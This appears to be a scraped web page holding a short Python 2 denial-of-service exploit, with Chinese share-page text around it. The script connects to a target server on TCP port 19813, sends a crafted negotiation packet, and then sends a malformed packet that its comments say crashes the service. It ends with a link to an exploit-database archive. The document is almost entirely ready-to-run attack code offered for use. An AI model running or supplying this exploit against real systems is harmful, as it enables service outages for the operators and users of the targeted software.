扫码分享
验证:
体验盒子#!/usr/bin/python
import socket,struct,sys,os
SIGN=0x04030201
cmd=0x01000000
def main():
if len(sys.argv)!=2:
print"\n[x] Usage: python "+sys.argv[0]+" < ip_server >\n"
sys.exit(0)
else:
host=sys.argv[1],19813 #default port TCP/19813
if sys.platform=="win32":
os.system("cls")
else:
os.system("clear")
s=socket.socket()
try:
s.connect(host)
s.recv(1024)
except:
print"[x] Error connecting to remote host! This is g00d :D."
sys.exit(0)
print"[+] Building crafted packets..."
#packet negotiation request
pktnego=struct.pack(">L",cmd+0x1) #+0
pktnego+=struct.pack("<L",0x00000000) #+4
pktnego+=struct.pack("<L",SIGN) #+8 (signature)
#packet crash
pkt1=struct.pack("<L",cmd+0x2)
pkt1+=struct.pack(">L",0x00000001) # != 0x0
pkt1+=struct.pack("<L",SIGN)
#end
print"[+] Negotiation."
s.send(pktnego)
s.recv(1024)
s.send(pkt1)#crash!
s.close()
if __name__=="__main__":
main()
#PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15214.zip
体验盒子
